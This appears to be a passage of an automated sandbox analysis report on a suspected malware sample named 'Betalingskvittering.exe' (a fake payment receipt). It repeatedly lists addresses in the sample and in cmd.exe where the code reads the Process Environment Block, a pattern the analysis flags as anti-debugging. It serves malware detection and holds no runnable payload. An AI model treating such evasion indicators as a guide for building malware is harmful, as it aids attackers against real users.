Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A1B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A38A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009F4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A35BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00971B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00971B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A1D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00993B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00993B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A38B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A214FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A38CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A18DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0097D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A38D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A2E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009EA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00987D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0098C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009FFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009E46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009936CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009A8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A1FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00A38ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009776E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_009916E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0099A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betalingskvittering.exe	Code function: 1_2_00998E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_002CB5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C58EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C436CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CCFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C276E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C416E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C946A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CDEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CA4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CCB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CCB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C5927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C48E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C28A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C15210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C33A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C54A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C54A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CCFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C537F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CCD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C21B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C21B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C42397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C28794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C1DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C2FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C43B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C43B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CE070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C4A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02C3F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CD131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02CAFF10 mov eax, dword ptr fs:[00000030h]
